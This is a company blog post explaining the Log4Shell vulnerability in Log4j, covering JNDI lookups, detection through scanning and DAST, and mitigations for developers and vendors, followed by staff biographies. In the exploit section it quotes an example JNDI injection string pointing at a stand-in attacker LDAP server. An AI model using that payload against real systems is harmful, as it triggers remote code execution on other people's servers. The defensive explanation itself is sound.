info@ideastoimpacts.com

Log4Shell Vulnerability

Author – Abhijit Limaye

What Is It, And What Could Software Vendors and Developers Do?

3RD PARTY LIBRARIES IN THE SOFTWARE SUPPLY CHAIN CONTINUE TO POSE SECURITY RISKS FOR WEB APPS

What Is Log4J, And What Is the Vulnerability (“Log4Shell” (CVE-2021-44228))?

Log4j is a very popular and widely used Java library for logging. Most software relies on logging as a way of providing additional diagnostics, debugging, or developer support in production environments. Logging makes it easy to spot or reproduce errors or issues in production software.

What Is JNDI?

One of the major advantages of Log4j is its flexibility and extensibility, including that provided by the “Lookup plugins.” Simply put, they allow the use of ‘functions’ in any part of the log message. Of particular interest to us is the JNDI, or Java Naming and Directory Interface, plugin. JNDI provides a way to retrieve Java objects stored in a directory service like LDAP. One of the most common JNDI use cases is to retrieve a “connection” object that is then used to access the database backend.

How Would an Exploit Work?

Now Log4j allows users to add a specially crafted messages which looks something like ${jndi:ldap://my-evil-ldap-server/evilresource}. The curly braces {} around a message instruct log4j library to ‘evaluate’ the expression contained within it and not simply log it as text. The result of this evaluation is fetching of the resource pointed to by the URL and evaluating or executing it on the system. This is what leads to the exploitation of vulnerability when an attacker can supply an attacker- controlled URL that contains malicious payloads as part of user input, in hopes that the user input somehow finds its way to a log entry.

Note* – Here Image will come as per existing blog: Source – https://www.ideastoimpacts.com/log4j-blog.php

 

How Do You Detect This Vulnerability?

Standard vulnerability scanners can check for the presence of the vulnerable version of the library on your system. Beyond that, they cannot do much as the vulnerability manifests through code. Unless some SAST tool scans code, they won’t know the attack surface. Tools like Software Composition Analysis will allow developers to scan dependencies in code for this library. So far, the best possible run-time detection is achieved by using the DAST (Dynamic Application Security Testing) tools for Web applications. Just like such tools test for SQL Injection attacks by trying to ‘inject’ SQL as part of user inputs, the same mechanisms can be used here to “inject” a crafted JNDI log message that includes a unique URL. If the URL sees a ‘hit’,” you’d know which part of the code is logging this crafted input.

Mitigation:

Needless to say, you can’t recommend that everyone stop using Log4J overnight, as that is almost impossible. Log4j comes bundled with other software packages that will make it even more difficult to identify and remove.

Here are some recommended mitigations for developers and software vendors.

For Developers:

  1. Logging is spread across your entire code. Scan your entire codebase to see where log strings are formed using any user input or stored data.
  2. If there is a need to log user input, sanitize it to not include ‘commands’ that trigger vulnerabilities.

3.Update your version of the log4j library with the patch release from Apache(https://logging.apache.org/log4j/2.x/security.html)

  1. Use the log4j flag “formatMsgNoLookups=True” to stop code execution, however, doubts remain if that is sufficient.
  2. A good practice in general is to perform security scanning of code and Software Composition Analysis scans for identifying vulnerable 3rd party libraries.
  3. Implement a regular process that checks for and updates third-party libraries
  4. Implement DevSecOps processes and implement code and application security scanning as part of your DevOps processes.

For Software Vendors

  1. Having a well-defined Open-Source Review process for approving use of any 3rd party open-source libraries, before the developers start using them in their code
  2. Secure by Design Approach: Security issues in code and products can no longer be an afterthought. Sensitize Engineering and product teams on security issues, conduct regular security training, implementing Secure Software Development and introducing DevSecOps Processes.
  3. Investment in tools for static and dynamic testing (SAST, DAST) and Software Composition Analysis that can uncover vulnerabilities hidden in 3rd party libraries.

In Summary

Cybersecurity is no longer a technology risk but a business imperative! No vulnerability can be taken lightly, and the Log4j vulnerability just elevates the challenge further. No one is immune to the risk posed. For organizations, it is literally a question of “when,” not “if,” they will get hacked. The key takeaways are implementing robust cybersecurity programs that include Secure Development, Vulnerability Management and Risk Analysis Programs, and most importantly Patching! Be a Cyber Security Champion and Stay Safe!

Update #1:

As we were getting ready to publish this blog post, another vulnerability in log4j hit the mainstream. This one is in the version of Log4J that Apache released to fix the earlier Log4Shell vulnerability. This one (CVE-2021-45105) can be exploited by attackers to cause a Denial-of-Service attack by using a crafted log message payload using ‘Recursive lookups. Apache has released version 2.17.0 of the patch for the newly disclosed vulnerability. We reiterate our message of taking Cyber Risk very seriously and implementing robust Cyber security programs in the organization!

Connect with i2i

Let us help you derive value from tech services

Office Address

Ideas to Impacts, Pallod Farms 3, Baner, Pune 411045, Maharashtra, India

Email: info@ideastoimpacts.com

Sales: 1-800-943-6444

business solutions

Website Developed by 
Dhruvanshi Pandya https://www.linkedin.com/in/dhruvanshipandya/

i2i NEWSLETTER

Get the best of i2i right in your inbox.

Subscribe to our curated newsletters for the latest in tech, business, and thought leadership.

You have been successfully Subscribed! Ops! Something went wrong, please try again.

Copyright©2024 ideas to impacts. All rights reserved.

Partner with Us


Download Case Study


Download Case Study


Consumption-Adoption Partner

If you are a technology platform company that sees growth from small and medium-sized enterprises (SMEs) and/or wants to drive more platform adoption, you can become an i2i Consumption-Adoption Partner.

Home-Town Interest Professionals

If you are an independent IT/BPM specialist seeking to work in your hometown, a tech entrepreneur looking to start a business offering IT/Tech services from your hometown, or a successful executive looking to give back by creating jobs in your hometown, you can become an i2i Home-Town Interest Professional Partner.

Skills & Training Partner

If you currently provide IT/BPM skills training and education in a smart town to help smart town talent elevate their skills, you can join i2i’s skills network as a Skills & Training Partner.

Real Estate Partner

If you are a real estate developer or builder in a smart town and have or can develop class A infrastructure to support economic activity in your smart town, you are eligible to join the i2i Infrastructure Network as a Real Estate Partner.

University Partner

If you are an educational institution in a smart town and intend to upgrade your curriculum to be industry-ready and connect with industry on work-study or student placement, you can join the i2i University Network as a University Partner.

Delivery Partner

If you are a high-quality IT/BPM services provider in Smart Town who want to expand your business, you can join the i2i Delivery Network as a Delivery Affiliate or Delivery Partner.


Download Case Study


Download Case Study


Download Case Study


Download Case Study


Download Case Study


Download Case Study


Download Case Study


Download Case Study


Download Case Study


Download Case Study


Download Case Study


Download Case Study


Download Case Study


Download Case Study


Download Case Study



Download Case Study


Sambhaji Chawle - Head of SAP

Bachelor of Engineering
ITIL Foundation, PMP V4 Certification from Project Management Institute SAP MDM 5.5. by SAP Labs, Bangalore Trained on Requisite Catalog eMerge/BugsEye by eMerge Team, Plano, USA

A seasoned Solutions Architect with 24 years of expertise in SAP implementations, upgrades, and support for large enterprises across Manufacturing, Utilities, and Services.

His key strengths are SAP Modules (MM, SRM, MDM, WM, QM, IS Utilities, Solution Manager, SAP SCM), Project & Program Management, Business Unit & Account Management, Onsite-Offsite-Offshore Delivery Models, and Building High-Performance Teams.

He has excellent exposure to on-site- offshore working models and has managed multiple transitions for large offshore projects. He has managed deliveries for large projects, including the handling of people care, vendor management, and support group interactions.

Anant Kulkarni - CTO

Bachelor of Science
Advance Certification in Software Engineering, IoT, Cloud, and Block chain (IIT, Madras)

A passionate techno-creative with over 27 years of professional experience thrives on building innovative IT solutions from the ground up. His expertise spans the entire product development lifecycle, with a particular strength in problem definition.

He has strong abstract thinking skills and ensures to start with the right goals at the outset.

Being the CTO at i2i, he spearheads cutting-edge digital transformation initiatives and drives strategic projects across the organization, extending beyond the typical CTO role.

His focus lies on enhancing the customer experience through technology and aligning projects with modern digital trends. His diverse background includes leading advertising and animation companies before transitioning to IT, acquiring and growing an IT solutions company awarded Startup India accreditation, and specializing in Industry 4.0 within the manufacturing sector.

He operates under the principles of “dare, dream, and deliver” on each project, which fuel his entrepreneurial spirit and continuous learning mindset.

Gireendra Kasmalkar

Founder & Chairman
M.S. Engineering (University of South Carolina, Columbia)
B. Tech. Mechanical (I.I.T. Mumbai, India)

Gireendra is the Founder and Chief Managing Director of Ideas to Impacts, as well as the brains behind the Ideas to Impacts Hub, an incubator/accelerator for tech start-ups in Pune that houses Ideas to Impacts’ Venture Capital (VC) Fund. In addition, he is the Lead Investor and Managing Partner at Pentathlon Ventures, which finances and supports early-stage B2B technology startups. He’s a frequent speaker at worldwide conferences on Software testing, entrepreneurship, and early-stage start-up investments.

He began his career at Tata Consultancy Services (TCS) but has spent most of his 30+ years in tech on entrepreneurial ventures. His first business venture was in the CAD-CAM industry, and from there he built the foundation for VeriSoft, a pioneering independent testing company. VeriSoft was one of India’s early and foremost independent testing organizations. It was later acquired by SQS AG, a global leader in independent testing services. Gireendra was the MD and CEO of SQS India at the time. He was also on the boards of SQS India BFSI (which is listed on the NSE and BSE) and SQS USA.

He founded Ideas to Impacts (i2i) to supply cutting-edge technological services from India’s non-metro talent hotspots (Smart Town Model – STM). He believes this model will empower talent communities in non-metros and is the next move for India’s tech offshoring industry.

He’s also a Director and President at the Inter-Institutional Inclusive Innovation Centre, a non-profit that encourages disruptive technological innovation in India. Additionally, he is associated with MCCIA, TiE, and CSI, and he mentors young aspiring social entrepreneurs at the Pune International Center’s Social Innovation Lab.

Anshoo Gaur - Co-founder and Group CEO

Bloomberg-UTV CXO IT MNC Asia Business Leader of the Year Award Winner in 2010
M.S. (Systems and Industrial Engineering, University of Arizona, Tucson)
B.E. Mechanical (NIT, Surathkal, India)

Anshoo is the Co-founder and Group CEO at Ideas to Impacts. He has over 30 years of experience as a founder, CEO, board member, advisor, and investor in the global tech industry. He is a seasoned tech executive and successful entrepreneur with expertise in restructuring businesses for growth and scale.

He has held numerous positions in senior management during his lucrative career and is a strong believer in the incredible potential of technology and innovation. His previous collaborations with Amdocs (Global Management Member, Global Officer), EDS (Managing Director and President, Mphasis ITO), and STL are remarkable (Advisor and CEO-Software).

Additionally, he has ties to a number of intriguing early-stage businesses and also works with young leaders who are dedicated to bringing about social change through his start-up accelerator, Praavega. He is the Founding Curator at the World Economic Forum (WEF), and he is working carefully to build a self-sustaining organization that is highly democratic and purpose-driven to make sure that positive change comes across all communities.  

Anshoo is a believer in the potential of mentoring and skilling to alter lives. He works with social sector entrepreneurs and NGOs to scale their impact. He’s an advisor with Mentor Together, Teach for India, and Life School. He has gained various honours, including the Bloomberg-UTV CXO IT MNC Asia Business Leader of the Year Award in 2010.

Niranjan Mahabalappa – Head, Software Product Engineering

Bachelor of Engineering (NIT, Karnataka)
MMS Finance (NMIMS)

Niranjan is a seasoned business leader with a proven track record of steering large global business units, generating over USD 200 million in revenue, and overseeing 4000+ personnel. With expertise spanning business growth, customer engagement, delivery, and team building, he excels in scaling operations for startups in the product engineering space.

A strategic and results-driven leader, Niranjan has successfully led enterprises in North America, Europe, and Asia, both multinational giants and startups. His prowess includes P&L ownership, M&A due diligence and integration, and talent development.

Beyond business, Niranjan is an inspiring and entrepreneurial figure, passionate about corporate social responsibility, sports, and alumni events. His commitment extends to leading impactful volunteer initiatives and showcasing his prowess as a national-level long-distance runner, earning numerous accolades. In addition, Niranjan spearheads Alumni Council initiatives, elevating branding, networking, and collaboration efforts.

Chandrashekhar Deshmukh – Business Head of i2i-Emerging Technologies, Nashik Smart Town Model (STM)

Master of Computer Application (North Maharashtra University)

Chandrashekhar is the Business Head of i2i-Emerging Technologies and has over 20 years of extensive experience in the technical space with specializations in delivery management, IoT, Devops, RPA, Cloud, and Performance Engineering.

He has effectively managed numerous complex and technically challenging projects in product and service companies, including Industrial IoT, Automation, Banking, ERP, CRM, Digital Publishing, and Legal Services.

He has a proven track record of managing large customer engagements for i2i, including Siemens, Infinite-uptime, Intuit, Microsoft, and LexisNexis. He also holds expertise in writing business proposals, estimating projects, implementing and improving processes, project planning, and managing people. His pragmatic approach to problem-solving consistently motivates the rest of the team to be more productive and efficient.

Rohan Jadhav – Head, Sales & Marketing

M. Tech. (IIT, Madras)
PGDBM, Marketing (Sydenham Institute of Management Studies)

Rohan is a seasoned professional dedicated to optimizing businesses and guiding them towards their full potential. Specializing in identifying lucrative business opportunities and shepherding ideas from conceptualization to launch, his passion for Go-to-Market (GTM) strategies is rooted in the conviction that every product or service can make a significant impact.

Rohan’s expertise extends to crafting comprehensive GTM plans, encompassing digital marketing, sales enablement, and client onboarding to facilitate seamless market entry for both our organization and our clients with GTM service needs.

As a seasoned marketing specialist and GTM expert, he possesses a profound understanding of the intricacies involved in successfully launching products and services.

Beyond his professional endeavors, Rohan is a creative individual with a penchant for travel, badminton, and staying abreast of emerging tech trends in the market.

Sandeep Ingale - Group CFO and Head of Operations

Master of Commerce (Pune University)
M.B.A. (Indira Gandhi National Open University)

Sandeep is the Group Chief Financial Officer and Director of Operations at Ideas to Impacts. He has more than 30 years of multifaceted experience in the global technology space. In addition, he has more than 10 years of expertise in the field of human resources, where he excelled at performance management, employee grievances, benefits, compliance, and retention.

As a seasoned executive in the global tech industry, he is adept at managing financial and business affairs, conducting audits under IFRS, US GAAP, and Indian GAAP, managing shared services units in India for US MNCs, and monitoring FDI compliance, due diligence, and setting up operations for Indian and multinational companies in the IT sector.

In addition to handling various responsibilities at the group level, he is currently focused on the business operations associated with Ideas to Impacts’ pioneering new ‘Work From Home-town (WFHT®)’ offering, which enables businesses to design, build, and implement work delivery models from tier 2/3 towns.

Prior to joining Ideas to Impacts, Sandeep worked as a leader for organizations such as Verisoft India Infosystems, SQS Software Systems AG, and SQS Software Systems USA, Inc. He is passionate about Ideas to Impacts’ core ideology of ‘Distributing the Future Evenly®,’ as it strongly resonates with his aspiration to be a part of an organization committed to bringing about positive change in diverse communities across the world. Outside of work, he loves to travel and contribute to the Indian startup ecosystem.

Trupti Joshi – Head, Business Unit Finance

Master of Commerce (Pune University)
Certified Management Accountant (Institute of Management Accountants, USA)

Trupti is the Head of Business Unit Finance at Ideas to Impacts. She works with tech-solution-focused Business Unit Leaders to assist them in strategically aligning their financial operations with anticipated growth strategies. She is also responsible for defining and
mapping group-wide financial processes to Ideas to Impacts' financial objectives.
Trupti started her career as an internal audit specialist at Venkateshwara Hatcheries. She has more than 20 years of experience with Mergers and Amalgamations, Financial Due Diligence, Audits, Management Reporting, IFRS Reporting, System Implementations, Process Mapping, Team Building, and Shared Services.
Prior to Ideas to Impacts, she led the US-focused Shared Services team at SQS Software Systems AG, an independent software testing and quality assurance supplier from India.
She strongly believes in the purpose-driven aspect of Ideas to Impacts and is applying her knowledge and expertise to make Ideas to Impacts a financially resilient organization.